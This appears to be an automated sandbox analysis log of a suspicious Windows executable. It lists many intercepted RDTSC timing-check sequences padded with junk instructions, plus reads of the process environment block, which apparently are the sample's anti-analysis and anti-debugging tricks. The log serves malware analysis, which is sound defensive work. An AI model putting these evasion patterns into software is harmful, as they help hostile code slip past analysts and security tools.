Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B06AFD second address: B06B13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push esi 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FDC0050BD4Bh 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B06B13 second address: B06B24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDC00CE27ADh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B049F3 second address: B049F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B049F9 second address: B049FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B0C4A9 second address: B0C4CE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FDC0050BD52h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jc 00007FDC0050BD4Ah 0x00000011 push edx 0x00000012 pop edx 0x00000013 push esi 0x00000014 pop esi 0x00000015 push ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B1E844 second address: B1E851 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007FDC00CE27B2h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B22D0F second address: B22D2B instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FDC0050BD46h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FDC0050BD50h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B27BEA second address: B27BF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B27BF0 second address: B27BF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B27BF4 second address: B27C21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDC00CE27B3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FDC00CE27B0h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B27C21 second address: B27C30 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B27C30 second address: B27C47 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC00CE27B3h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B27C47 second address: B27C4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B2F7C5 second address: B2F807 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC00CE27B9h 0x00000007 jmp 00007FDC00CE27B5h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jng 00007FDC00CE27C2h 0x00000014 push eax 0x00000015 push edx 0x00000016 jnl 00007FDC00CE27A6h 0x0000001c push edi 0x0000001d pop edi 0x0000001e rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B33713 second address: B33717 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B33717 second address: B3373B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC00CE27B8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jo 00007FDC00CE27A6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B3373B second address: B3373F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B39615 second address: B3961B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B3961B second address: B3964C instructions: 0x00000000 rdtsc 0x00000002 ja 00007FDC0050BD4Eh 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jnc 00007FDC0050BD46h 0x00000011 jbe 00007FDC0050BD46h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FDC0050BD4Ah 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B3964C second address: B39651 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B39651 second address: B39659 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B39659 second address: B3965D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B38031 second address: B38035 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B38035 second address: B38039 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B38039 second address: B3804A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 ja 00007FDC0050BD46h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B3835E second address: B38364 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B38364 second address: B38372 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007FDC0050BD46h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B38372 second address: B38390 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FDC00CE27B5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B384EF second address: B384F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B3862D second address: B38633 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B38633 second address: B38675 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDC0050BD4Dh 0x00000009 popad 0x0000000a jmp 00007FDC0050BD57h 0x0000000f pushad 0x00000010 jmp 00007FDC0050BD56h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B38675 second address: B3867B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B387D6 second address: B387F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC0050BD57h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B387F2 second address: B387F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B38961 second address: B38967 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B39357 second address: B39375 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FDC00CE27A6h 0x00000008 jmp 00007FDC00CE27B4h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B3E19F second address: B3E1C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDC0050BD4Eh 0x00000009 popad 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d jp 00007FDC0050BD46h 0x00000013 jp 00007FDC0050BD46h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B3E1C2 second address: B3E1E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FDC00CE27A6h 0x00000009 jmp 00007FDC00CE27B7h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B3E1E4 second address: B3E1EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B4208C second address: B42090 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B42090 second address: B42094 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B42094 second address: B4209A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B4209A second address: B420A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B420A4 second address: B420C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FDC00CE27B2h 0x0000000c popad 0x0000000d push ebx 0x0000000e push ebx 0x0000000f jnp 00007FDC00CE27A6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B7DA66 second address: B7DA72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 pushad 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B7DA72 second address: B7DA81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FDC00CE27A6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B7DA81 second address: B7DAAE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC0050BD57h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007FDC0050BD4Dh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B7FF9F second address: B7FFAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jng 00007FDC00CE27A6h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B7FFAC second address: B7FFD6 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FDC0050BD4Eh 0x00000008 pushad 0x00000009 jmp 00007FDC0050BD57h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B8F530 second address: B8F534 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B8F534 second address: B8F538 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B8F538 second address: B8F53E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B92BF9 second address: B92C15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FDC0050BD46h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d jmp 00007FDC0050BD4Fh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B92C15 second address: B92C43 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC00CE27B3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c jmp 00007FDC00CE27B2h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B92C43 second address: B92C48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B949E0 second address: B949E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B949E4 second address: B949E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B949E8 second address: B949FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDC00CE27AAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B949FB second address: B94A01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B9480F second address: B94813 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B94813 second address: B9481D instructions: 0x00000000 rdtsc 0x00000002 jp 00007FDC0050BD46h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B9481D second address: B94829 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B94829 second address: B9482D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B9482D second address: B94848 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC00CE27B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B94848 second address: B94854 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FDC0050BD46h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: B94854 second address: B94858 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: C62647 second address: C6264B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: C6264B second address: C6265E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC00CE27ADh 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: C61571 second address: C61575 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: C616E2 second address: C616E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: C6185C second address: C61866 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FDC0050BD46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: C61866 second address: C6186A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: C61F10 second address: C61F20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDC0050BD4Bh 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: C61F20 second address: C61F61 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC00CE27ADh 0x00000007 jmp 00007FDC00CE27ACh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jno 00007FDC00CE27AEh 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FDC00CE27B3h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: C6673C second address: C66779 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDC0050BD53h 0x00000009 popad 0x0000000a jo 00007FDC0050BD5Fh 0x00000010 jmp 00007FDC0050BD59h 0x00000015 popad 0x00000016 push eax 0x00000017 push eax 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: C669CD second address: C669EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC00CE27AFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jo 00007FDC00CE27AEh 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: C66B1B second address: C66B1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: C66B1F second address: C66B38 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC00CE27B5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: C66B38 second address: C66B3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: C66B3E second address: C66B42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: C6A464 second address: C6A468 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F6000A second address: 6F60083 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FDC00CE27B6h 0x00000008 adc ah, FFFFFFE8h 0x0000000b jmp 00007FDC00CE27ABh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushfd 0x00000014 jmp 00007FDC00CE27B8h 0x00000019 sub si, 8048h 0x0000001e jmp 00007FDC00CE27ABh 0x00000023 popfd 0x00000024 popad 0x00000025 xchg eax, ebp 0x00000026 jmp 00007FDC00CE27B6h 0x0000002b push eax 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f movzx eax, bx 0x00000032 mov edi, 00E286ECh 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F60083 second address: 6F60089 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F60089 second address: 6F6008D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F6008D second address: 6F600C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC0050BD4Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007FDC0050BD50h 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FDC0050BD4Ah 0x0000001c rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F600C0 second address: 6F600C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F600C4 second address: 6F600CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F600CA second address: 6F600FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC00CE27AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr fs:[00000030h] 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FDC00CE27B7h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F600FB second address: 6F60113 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDC0050BD54h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F60113 second address: 6F60172 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC00CE27ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b sub esp, 18h 0x0000000e jmp 00007FDC00CE27B6h 0x00000013 xchg eax, ebx 0x00000014 jmp 00007FDC00CE27B0h 0x00000019 push eax 0x0000001a pushad 0x0000001b pushad 0x0000001c mov cx, dx 0x0000001f jmp 00007FDC00CE27B3h 0x00000024 popad 0x00000025 movzx eax, dx 0x00000028 popad 0x00000029 xchg eax, ebx 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F60172 second address: 6F60178 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F60178 second address: 6F6017D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F6017D second address: 6F601B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ebx, dword ptr [eax+10h] 0x0000000d jmp 00007FDC0050BD57h 0x00000012 xchg eax, esi 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FDC0050BD55h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F601B9 second address: 6F601BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: 6F601BF second address: 6F601C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
